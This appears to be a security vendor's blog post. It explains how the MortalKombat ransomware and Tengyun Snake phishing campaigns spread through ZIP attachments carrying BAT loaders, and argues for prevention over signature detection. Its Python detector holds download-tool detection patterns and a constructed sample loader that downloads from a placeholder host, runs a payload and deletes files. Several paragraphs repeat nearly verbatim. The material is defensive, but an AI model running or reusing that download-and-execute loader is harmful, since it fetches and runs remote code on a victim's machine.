Attachment-based malware threats are not dying out; they have become a persistent threat. In early 2023, researchers discovered a new ransomware threat, MortalKombat, that spreads through phishing emails and targets victims worldwide. MortalKombat and Tengyun Snake are the emerging email threats that have made experts wonder whether detection-based approaches are still enough today.
Researchers identified another emerging threat in February 2023, when they found that the cybercriminals behind the latest financially motivated campaign were using ‘MortalKombat,’ a variant of the Xorist commodity ransomware, in conjunction with the Laplas Clipper in their cyberattacks.
Experts describe MortalKombat as a ransomware strain modelled on the Xorist commodity ransomware family, which ships with a builder that lets cybercriminals customize the malware. A free decryptor for Xorist has been available since 2016. The victims of the attack were located in the United States, the UK, Turkey, and the Philippines.
The Difference Between MortalKombat and Tengyun Snake
Although MortalKombat and Tengyun Snake share the same threat vector, phishing emails, their kill chains differ. The MortalKombat kill chain starts when an attacker sends a malicious ZIP attachment containing the payload. After the victim downloads the attachment, the ransomware deploys quickly and launches a multi-stage attack.
In contrast, Tengyun Snake has a more sophisticated kill chain. The cybercriminals first use social engineering, impersonating government departments, and then send spear-phishing emails to selected targets. These emails carry compressed packages containing malicious Word or PDF documents that exploit a DDE vulnerability. Victims who click on the document deploy the custom malware, which silently exfiltrates data.
The Persistence of Attachment-Based Malware Threats: A Growing Concern
Attachment-based malware threats continue to pose a persistent and escalating danger in the digital landscape. Recent discoveries by researchers in early 2023 unveiled a new ransomware threat known as MortalKombat. This malicious software spreads through phishing emails and targets victims on a global scale.
Alongside MortalKombat, another emerging email threat called Tengyun Snake has experts questioning the adequacy of detection-based approaches in today’s cybersecurity landscape.
How Did the Attacks Unfold?
In both emerging email threats, the victim receives an email with a malicious ZIP attachment containing a BAT loader script. The loader downloads a second archive from a remote server, and that archive holds one of the two malware payloads.
When the victim opens the malicious attachment, the loader script runs the downloaded payload on the compromised system. The malware then deletes the downloaded files to minimize the chances of detection.
Understanding the Unique Characteristics of MortalKombat and Tengyun Snake
Experts describe MortalKombat as a ransomware strain that closely resembles the Xorist commodity ransomware family. It uses a builder that lets cybercriminals customize the malware to suit their goals. Notably, Xorist has been decryptable since 2016.
The victims of MortalKombat attacks have been identified across various countries, including the United States, the UK, Turkey, and the Philippines. On the other hand, Tengyun Snake takes a more sophisticated approach, utilizing social engineering techniques and spear-phishing emails to target specific individuals or high-value organizations.
Why Does a Detection-Based Approach Not Work for These Emerging Threats?
Experts note that MortalKombat and Tengyun Snake have different objectives and kill chains. MortalKombat aims for financial gain from its victims, whereas Tengyun Snake focuses on stealing sensitive data, such as intellectual property, from a specific target or other high-value organizations in the military, energy, government, and technology sectors.
Despite their different kill chains and objectives, the two emerging email threats share one trait: detection-based security measures cannot detect them, because the attackers deliver the malware as an attachment inside phishing emails.
Because these delivery mechanisms let threat actors create new variants easily, no signature patterns exist for them, and traditional antivirus engines therefore cannot detect them easily.
Additionally, blocking the email addresses linked to phishing emails is not a workable solution either, because spoofing techniques let threat actors bypass all traditional detection mechanisms of that kind.
Image sourced from securitydelta.nl
How the Attacks Unfold: How MortalKombat and Tengyun Snake Operate
In both MortalKombat and Tengyun Snake attacks, victims receive emails containing malicious ZIP attachments. These attachments, which often include a BAT loader script, download further archives from remote servers that contain the actual malware payloads.
Once the victim opens the malicious attachment, the loader script executes the downloaded payload, initiating the multi-stage attack on the compromised system. The malware operates covertly, deleting the downloaded files to minimize the chances of detection.
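To make the argument of the previous two sections concrete (the ZIP-with-BAT-loader kill chain, and why a hash signature for one builder-generated variant does not help), here is an added Python sketch of a behaviour-based attachment check; it is illustrative code written for this post, not the researchers' or any vendor's tooling. It flags script and nested-archive members inside an emailed ZIP and looks for the download, execute and delete stages in any BAT loader it finds. The sample attachment, the `Invoice_2023.bat` name and the `stage.invalid` URL are all constructed for the demo and never resolve.

```python
import io
import re
import zipfile

# File types that should not arrive as loose members of an emailed archive.
SCRIPT_EXTS = {".bat", ".cmd", ".vbs", ".js", ".ps1", ".exe", ".scr"}
ARCHIVE_EXTS = {".zip", ".rar", ".7z"}
TEXT_SCRIPT_EXTS = {".bat", ".cmd", ".ps1"}

# Markers for the three loader stages described in the post: fetch, run, delete the evidence.
STAGES = (
    ("download", re.compile(r"invoke-webrequest|certutil|bitsadmin|curl|wget", re.I)),
    ("execute", re.compile(r"^\s*(start|call)\b|expand-archive|\btar\b", re.I | re.M)),
    ("cleanup", re.compile(r"^\s*del\b|remove-item", re.I | re.M)),
)

def inspect_attachment(zip_bytes):
    """Return findings for a ZIP attachment; an empty list means nothing suspicious."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename.lower()
            ext = name[name.rfind("."):] if "." in name else ""
            if ext in ARCHIVE_EXTS:
                findings.append(f"nested archive: {info.filename}")
            if ext in SCRIPT_EXTS:
                findings.append(f"script or executable member: {info.filename}")
            if ext in TEXT_SCRIPT_EXTS:
                text = zf.read(info).decode("utf-8", errors="replace")
                hits = [stage for stage, rx in STAGES if rx.search(text)]
                # Two or more stages together is the loader pattern, whatever the file hash.
                if len(hits) >= 2:
                    findings.append(f"loader behaviour in {info.filename}: {'+'.join(hits)}")
    return findings

def build_zip(members):
    """Build an in-memory ZIP from {name: bytes}; used only to construct the samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()

# Constructed, inert sample mirroring the described kill chain (stage.invalid never resolves).
SAMPLE_LOADER = (
    b'powershell -c "Invoke-WebRequest http://stage.invalid/next.zip -OutFile next.zip"\r\n'
    b"tar -xf next.zip\r\nstart payload.exe\r\ndel next.zip payload.exe\r\n"
)
MALICIOUS_ZIP = build_zip({"Invoice_2023.bat": SAMPLE_LOADER})
BENIGN_ZIP = build_zip({"report.pdf": b"%PDF-1.4 constructed placeholder"})
```

Renaming or repacking the loader changes its hash but not the stage pattern, which is the point the post makes about signature-based engines; a content-disarm gateway would simply refuse to deliver the script member at all.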
Final Words
As we have seen, advanced malware threats like MortalKombat and Tengyun Snake are emerging threats that can cost organizations millions. They are all the more dangerous because traditional detection-based methods are unable to detect them.
However, this does not mean your business has to remain vulnerable. Preventing such advanced email threats requires more than detection: a prevention-based cybersecurity solution that proactively disarms all active content before it can trigger. With such a solution in place, organizations can ensure that their employees’ mailboxes remain protected from unknown advanced threats.